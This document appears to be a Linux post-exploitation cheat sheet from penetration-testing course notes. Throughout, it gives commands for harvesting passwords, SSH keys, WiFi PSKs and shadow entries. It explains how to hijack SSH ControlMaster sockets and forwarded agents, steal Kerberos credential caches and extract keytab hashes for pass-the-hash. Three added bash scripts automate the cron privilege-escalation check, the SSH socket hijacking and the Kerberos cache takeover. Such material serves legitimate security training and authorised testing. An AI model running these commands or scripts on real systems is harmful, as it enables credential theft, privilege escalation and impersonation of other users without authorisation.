Linux
Introduction
This section collects commands that help you enumerate a Linux system and gather the information needed for later privilege escalation or lateral movement.
User and group enumeration
Print the real and effective user and group IDs of the current user:
id
List all local users with their UID, primary GID, home directory and login shell:
cat /etc/passwd
List accounts whose password field is empty, i.e. that need no password to log in (reading /etc/shadow requires root):
sudo awk -F: '($2==""){print}' /etc/shadow
List the allowed (and forbidden) sudo commands for the invoking user, or for the user given with -u:
sudo -l
List all existing groups:
sort /etc/group
Print previously executed commands (look for credentials). history shows the current shell's session, while ~/.bash_history is what earlier sessions wrote to disk (other shells keep their own files, e.g. ~/.zsh_history):
cat ~/.bash_history
history
Operating System
Kernel version, hostname and architecture:
uname -a
Environment variables:
env
Network Enumeration
List network interfaces:
ip -br a
List all TCP and UDP connections with their owning process (resolving other users' processes needs root):
netstat -putona
List only listening ports (netstat, or its replacement ss; add -u to ss to include UDP):
netstat -pluton
ss -pltn
List static hostname mappings (internal hostnames are often pinned here):
cat /etc/hosts
List iptables rules (needs root; on nftables-based systems look at nft list ruleset instead):
sudo iptables -L -n -v
Established connections to a specific IP or network:
ss -anpt | grep <NETWORK> | grep ESTAB
Real-time traffic capture (needs root or CAP_NET_RAW; add -w <file> to save a pcap for offline analysis):
tcpdump -i <if> -s0 -n -vv
Obtain saved WiFi passwords (NetworkManager keeps PSKs in root-readable connection files):
sudo grep psk= /etc/NetworkManager/system-connections/*
Files enumeration
Files owned by a user or group
There might be files owned by a specific user stored in hidden directories. Without parentheses find binds -type f only to the -user test, so the -group branch also returns directories and devices; excluding /proc removes the noise:
find / -type f \( -user <user> -o -group <group> \) -not -path '/proc/*' 2>/dev/null
Modified files
There might be files modified by a cron job or during the workday. -newermt takes a GNU date string, e.g. '2024-05-13 08:00':
find / -type f -newermt '<start date>' ! -newermt '<end date>' 2>/dev/null
Accessed files
There might be files accessed by a cron job or during the workday. Most filesystems are mounted with relatime (or noatime), so the access time is only updated when it is older than the modification time or more than a day old; treat hits as a hint, not a log:
find / -type f -newerat '<start date>' ! -newerat '<end date>' 2>/dev/null
Disks
List the filesystems mounted at boot; network shares listed here sometimes point at a credentials file (cifs credentials=) that is worth reading:
cat /etc/fstab
Password Enumeration
Look for files that contain passwords or keys. Do not use grep's -w (whole-word) flag with a prefix such as "passw": with -w it never matches "password" or "passwd". Excluding /proc and /sys keeps grep from reading pseudo-files such as /proc/kcore; starting from /etc, /home, /var or /opt instead of / is usually faster still. Modern SSH keys are named id_ed25519 or id_ecdsa rather than id_rsa.
# Passwords
grep -rn / --exclude-dir=proc --exclude-dir=sys -i -e "passw" --color=always 2>/dev/null
grep -i passw ~/.bash_history
# Find SSH keys
find / -type f -name "id_*" ! -name "*.pub" 2>/dev/null
grep -rnw / --exclude-dir=proc --exclude-dir=sys -i -e "private key" --color=always 2>/dev/null
Cronjobs
List scheduled jobs. crontab -l prints the calling user's own crontab (-e would open it for editing). System jobs live in /etc/crontab, /etc/cron.d/ and the periodic /etc/cron.hourly, cron.daily, cron.weekly and cron.monthly directories; other users' crontabs are under /var/spool/cron/ and readable only by root. Systemd timers (systemctl list-timers --all) are the other scheduler to check.
cat /etc/crontab
crontab -l
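As an added example (not part of the original page), the following script extends the cron check above: it parses /etc/crontab, /etc/cron.d/* and the calling user's own crontab, extracts the command of each entry, and reports any referenced absolute path that the current user can write, or whose directory is writable, since a writable script executed by root's cron is a direct route to root. The function names and the constructed input in the comments are the example's own.

```shell
#!/usr/bin/env bash
# Added example, not from the original page: find cron entries whose command,
# script or containing directory the current user can modify.

# Print the command field of every active entry in a crontab-format file
# ("-" reads stdin). System files (/etc/crontab, /etc/cron.d/*) carry a user
# field after the five time fields; user crontabs (crontab -l) do not, so pass
# "user" as the second argument for those.
cron_commands() {
    local file="$1" kind="${2:-system}" skip=6
    [ "$kind" = user ] && skip=5
    awk -v skip="$skip" '
        /^[[:space:]]*#/ || /^[[:space:]]*$/ { next }      # comments, blank lines
        /^[[:space:]]*[A-Za-z_][A-Za-z0-9_]*=/ { next }    # SHELL=, PATH=, MAILTO=
        {
            n = ($1 ~ /^@/) ? skip - 4 : skip              # @reboot etc. replace the 5 time fields
            cmd = $(n + 1)
            for (i = n + 2; i <= NF; i++) cmd = cmd " " $i
            if (cmd != "") print cmd
        }' "$file" 2>/dev/null
    return 0
}

# For each absolute path in a cron command, report whether the current user can
# write the file itself, or the directory holding it (so the file can be replaced).
writable_targets() (
    set -f                               # no globbing while splitting on whitespace
    for tok in $1; do
        case "$tok" in /*) ;; *) continue ;; esac
        tok="${tok%%[;|&)]*}"            # drop shell operators glued to the path
        if [ -w "$tok" ]; then
            printf 'WRITABLE %s\n' "$tok"
        elif [ -e "$tok" ] && [ -w "$(dirname "$tok")" ]; then
            printf 'DIR-WRITABLE %s\n' "$tok"
        fi
    done
    exit 0
)

# Scan the standard locations. Files in /etc/cron.{hourly,daily,weekly,monthly}
# are executed as root by run-parts, so each of them is a target in itself.
scan_cron() {
    local f cmd
    for f in /etc/crontab /etc/cron.d/*; do
        [ -f "$f" ] || continue
        cron_commands "$f" system | while read -r cmd; do
            writable_targets "$cmd" | sed "s|^|$f: |"
        done
    done
    for f in /etc/cron.hourly/* /etc/cron.daily/* /etc/cron.weekly/* /etc/cron.monthly/*; do
        [ -f "$f" ] && [ -w "$f" ] && printf 'WRITABLE %s (run-parts)\n' "$f"
    done
    crontab -l 2>/dev/null | cron_commands - user | while read -r cmd; do
        writable_targets "$cmd" | sed 's|^|own crontab: |'
    done
    return 0
}

scan_cron
```

Run it as the low-privileged user you landed as: a WRITABLE hit on a script run from /etc/crontab or /etc/cron.d means root will execute whatever you put there on the next tick. A DIR-WRITABLE hit needs one more step (replace the file, since the directory lets you unlink and recreate it). Relative commands and scripts reached through PATH are not resolved here; check the PATH= line of the crontab for writable entries yourself.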
SSH
Find SSH private keys (newer keys are named id_ed25519 or id_ecdsa rather than id_rsa; ~/.ssh/authorized_keys and known_hosts show where a key is accepted and where the user connects):
find /home/ -iname "id_*" ! -name "*.pub"
find /home/ -iname "*.key"
Control Master
When ControlMaster is enabled, the first SSH connection to a host becomes the master and later connections to the same host are multiplexed over it through a Unix socket (the ControlPath). This speeds up connections and saves resources when the same server is reached repeatedly.
An attacker who gains access to a host where ControlMaster is in use, as the socket's owner or as root (the socket is mode 600), can open new sessions over the existing master connection without authenticating again: the master already holds the authenticated channel, and this works as long as the master stays up.
Check whether ~/.ssh/config exists with a configuration like the following, which means ControlMaster is enabled (Host * applies it to every destination):
Host *
ControlPath ~/.ssh/controlmaster/%r@%h:%p
ControlMaster auto
ControlPersist 10m
Look for active connections, which appear as Unix sockets (type s in ls) under ~/.ssh/controlmaster/.
offsec@controller:~$ ls -al ~/.ssh/controlmaster/
total 8
drwxrwxr-x 2 offsec offsec 4096 May 13 13:55 .
drwx------ 3 offsec offsec 4096 May 13 13:55 ..
srw------- 1 offsec offsec 0 May 13 13:55 offsec@linuxvictim:22
Use the existing connection for lateral movement. The master must still be running; ssh -O check -S <socket> <host> tells you without opening a session.
User: If the socket belongs to your own user, your config already points ControlPath at it, so a plain ssh to the same host reuses the master:
ssh offsec@linuxvictim
Root: name the socket explicitly with -S, because root's own config has no matching ControlPath:
ssh -S /home/offsec/.ssh/controlmaster/offsec\@linuxvictim\:22 offsec@linuxvictim
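The ControlMaster procedure above, as an added example that is not from the original page: it finds Unix sockets under .ssh directories (every user's when run as root), derives the ssh -S reuse command from the socket name, and asks each master whether it is still alive with ssh -O check. The parser assumes the %r@%h:%p ControlPath naming shown in the config above; other layouts (for instance %C hashes) need a different parser, and the function names are the example's own.

```shell
#!/usr/bin/env bash
# Added example, not from the original page: enumerate SSH ControlMaster
# sockets, build the reuse command for each and check whether the master is up.
# Assumes ControlPath ends in %r@%h:%p (user@host:port), as in the page's config.

# Turn /home/u/.ssh/controlmaster/offsec@linuxvictim:22 into the ssh command
# that rides the existing master. Returns 1 if the name does not parse.
controlmaster_cmd() {
    local sock="$1" name user host port
    name="${sock##*/}"
    case "$name" in
        *@*:*) ;;
        *) return 1 ;;
    esac
    user="${name%%@*}"
    host="${name#*@}"; host="${host%:*}"
    port="${name##*:}"
    printf "ssh -S '%s' -p %s %s@%s\n" "$sock" "$port" "$user" "$host"
}

# Candidate sockets: Unix sockets (-type s) below any .ssh directory. Agent
# sockets live under /tmp, so these are almost always ControlMaster sockets.
# Only the owner or root can connect to them (mode 600).
find_controlmaster_sockets() {
    find /root /home -type s -path '*/.ssh/*' 2>/dev/null
    return 0
}

# `ssh -O check` talks to the control socket without opening a session;
# exit status 0 means a live master that can be reused.
controlmaster_alive() {
    ssh -O check -S "$1" "$2" >/dev/null 2>&1
}

main() {
    local sock cmd
    find_controlmaster_sockets | while read -r sock; do
        cmd=$(controlmaster_cmd "$sock") || { printf 'UNPARSED %s\n' "$sock"; continue; }
        if controlmaster_alive "$sock" "${cmd##* }"; then
            printf 'LIVE  %s\n      %s\n' "$sock" "$cmd"
        else
            printf 'DEAD  %s\n' "$sock"
        fi
    done
    return 0
}

main
```

A DEAD socket is a stale file left behind after the master exited (or one you cannot connect to as the current user); a LIVE one gives you an authenticated session to the named host with the printed command, and anything you do through it shows up in the victim's own connection.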
SSH Agent Forwarding
SSH agent forwarding lets the ssh-agent on a user's workstation answer authentication requests for connections made from a server the user is logged into: the agent socket is tunnelled to the server, where it appears as SSH_AUTH_SOCK in that session's environment.
If an attacker gains access to a machine where a forwarded agent is active, they can use the forwarded socket to authenticate to other machines as that user, for as long as the session stays open, without ever obtaining the private key.
Agent forwarding needs both ends to allow it: the victim's client configuration (ForwardAgent yes in ~/.ssh/config, or ssh -A) and the sshd on the machine you are on (AllowAgentForwarding yes in /etc/ssh/sshd_config, which is the default). Then check for active SSH sessions on the host:
ps aux | grep '[s]sh'
User: If the forwarded session belongs to your own user, the agent socket is already reachable: inside that session SSH_AUTH_SOCK is set, so ssh-add -l lists the keys and a plain ssh to the next host uses them.
Root: Inspect processes with "ssh" in the name to find open sessions on the host, then use the usernames from those sessions with pstree to get the process IDs (PIDs) of their shells:
pstree -p <USER> | grep ssh
sshd(15228)---bash(15229)---su(15241)---bash(15242)
sshd(16380)---bash(16381)
Then extract SSH_AUTH_SOCK from that shell's environment; /proc/<PID>/environ is NUL-separated, so convert it to lines first (reading another user's environ requires root):
tr '\0' '\n' < /proc/16381/environ | grep ^SSH_AUTH_SOCK=
Point your own ssh-add at that socket (the agent PID in the socket path matches the sshd process). This lists the keys the forwarded agent will sign with; the private keys themselves never leave the victim's workstation, so the agent is only usable while the session stays open:
root@controller:~# SSH_AUTH_SOCK=/tmp/ssh-7OgTFiQJhL/agent.16380 ssh-add -l
Finally, try the target you suspect the victim connects to, or look for clues about where they connect: established outbound SSH connections, the user's ~/.ssh/known_hosts and shell history. Filtering on the destination port avoids matching any address that happens to contain 22:
ss -ntp state established '( dport = :22 )'
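The agent-forwarding hunt above, as an added example (not the original page's code): instead of reading pstree output by hand it walks /proc, pulls SSH_AUTH_SOCK out of each process's NUL-separated environ (other users' environments are readable only as root), and lists the keys every live agent socket offers with ssh-add -l. The function names are the example's own; the socket and path formats are the ones shown above.

```shell
#!/usr/bin/env bash
# Added example, not from the original page: as root, find every process that
# carries SSH_AUTH_SOCK (a forwarded or local ssh-agent) and list the keys each
# live agent will sign with. To use one: SSH_AUTH_SOCK=<sock> ssh user@target

# Extract one variable from a NUL-separated /proc/<pid>/environ-style file.
# Prints nothing if the file is unreadable or the variable is absent.
environ_get() {
    local file="$1" name="$2"
    tr '\0' '\n' < "$file" 2>/dev/null | sed -n "s/^${name}=//p" | head -n 1
}

# Print "pid user socket" for every process whose environment names an agent socket.
agent_sockets() {
    local pid sock user
    for pid in /proc/[0-9]*; do
        pid="${pid#/proc/}"
        sock=$(environ_get "/proc/$pid/environ" SSH_AUTH_SOCK)
        [ -n "$sock" ] || continue
        user=$(stat -c %U "/proc/$pid" 2>/dev/null)
        printf '%s %s %s\n' "$pid" "${user:-?}" "$sock"
    done
    return 0
}

main() {
    local pid user sock
    # One line per distinct socket; several processes of one session share it.
    agent_sockets | sort -u -k3 | while read -r pid user sock; do
        if [ ! -S "$sock" ]; then
            printf 'STALE %s (pid %s, %s)\n' "$sock" "$pid" "$user"
            continue
        fi
        printf 'AGENT %s (pid %s, %s)\n' "$sock" "$pid" "$user"
        # ssh-add -l only asks the agent for its key list; no key material is exposed.
        SSH_AUTH_SOCK="$sock" ssh-add -l 2>&1 | sed 's/^/      /'
    done
    return 0
}

main
```

STALE entries are sessions whose agent socket has already gone away (the /tmp/ssh-XXXX directory is removed when the session ends), so only AGENT lines are usable. ssh-add -L instead of -l prints the public keys, which is handy for matching them against authorized_keys on candidate targets.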
Kerberos
Kerberos tickets can also be found on Linux machines joined to an Active Directory domain. Enumerating the machine for Kerberos material can be crucial for lateral movement to other hosts in the domain.
Obtain the realm, KDCs and the default credential cache location (default_ccache_name) from the Kerberos configuration file:
cat /etc/krb5.conf
Find file-based user credential caches (the MIT default is /tmp/krb5cc_<uid>; SSSD or KCM setups store them elsewhere, so follow default_ccache_name):
find /tmp/ -type f -iname "*krb5cc_*" 2>/dev/null
Impersonate a user with a krb5cc_ file. Copy one specific cache (cp into a single destination fails if the glob expands to several files), make the copy yours, and point KRB5CCNAME at it; working on a copy leaves the victim's cache intact. kdestroy only clears the cache currently selected, so run it (if at all) before exporting KRB5CCNAME, never after:
sudo cp /tmp/<VICTIM_KRB5CC_FILE> /tmp/krb5cc_minenow
sudo chown <ATTACKER_USER>:<ATTACKER_USER> /tmp/krb5cc_minenow
kdestroy
export KRB5CCNAME=/tmp/krb5cc_minenow
klist
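The credential-cache takeover above, as an added example (not from the original page): it lists file caches with owner and mode, prints each cache's principal and ticket lifetimes with klist -c where klist is installed, and copies a chosen cache to a private mode-600 file before exporting KRB5CCNAME, so the victim's cache and its renewal are never disturbed. The /tmp location, the hijack file name and the function names are the example's own assumptions.

```shell
#!/usr/bin/env bash
# Added example, not from the original page: enumerate Kerberos credential
# caches on a domain-joined Linux host and take a private copy to use.
# /tmp/krb5cc_* is the MIT default; check default_ccache_name in /etc/krb5.conf
# if nothing turns up (SSSD/KCM setups keep caches elsewhere).

# List FILE caches in a directory as "owner mode path".
find_ccaches() {
    local dir="${1:-/tmp}"
    find "$dir" -maxdepth 1 -type f -name 'krb5cc_*' -printf '%u %m %p\n' 2>/dev/null
    return 0
}

# Copy a cache to a file only we can read and point KRB5CCNAME at it.
# Works as root for any cache, or for a cache you can already read. Do not run
# kdestroy afterwards: it would delete the copy you just started using.
use_ccache() {
    local src="$1" dest
    [ -r "$src" ] || { printf 'cannot read %s\n' "$src" >&2; return 1; }
    dest=$(mktemp /tmp/krb5cc_hijack.XXXXXX) || return 1      # assumed naming
    cp "$src" "$dest" && chmod 600 "$dest" || return 1
    export KRB5CCNAME="FILE:$dest"
    printf '%s\n' "$KRB5CCNAME"
}

main() {
    local owner mode path
    find_ccaches /tmp | while read -r owner mode path; do
        printf '%s %s %s\n' "$owner" "$mode" "$path"
        # klist -c reads the cache read-only: principal, service tickets, expiry.
        if command -v klist >/dev/null 2>&1; then
            klist -c "$path" 2>/dev/null | sed 's/^/    /'
        fi
    done
    return 0
}

main
```

Pick a cache whose klist output shows a principal you want and a TGT that has not expired, call use_ccache on it in your current shell (not in a subshell, or the export is lost), and klist with no arguments should then show the same tickets under your own user.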
Find keytab files.
find / -type f -iname "*.keytab" 2>/dev/null
ls /etc/krb5.*
Extract keytab contents: realm, service principal and the stored keys, including the RC4-HMAC key, which equals the account's NT hash and can be used for pass-the-hash:
python3 KeyTabExtract/keytabextract.py krb5.keytab
List tickets currently stored in the user’s credential cache file.
klist
Convert a Mimikatz or Rubeus .kirbi ticket to ccache format with Impacket's ticketConverter.py, then point KRB5CCNAME at the result:
ticketConverter.py adminWebSvc.kirbi adminWebSvc.ccache
export KRB5CCNAME=/var/www/html/OSEP/Challenge6/adminWebSvc.ccache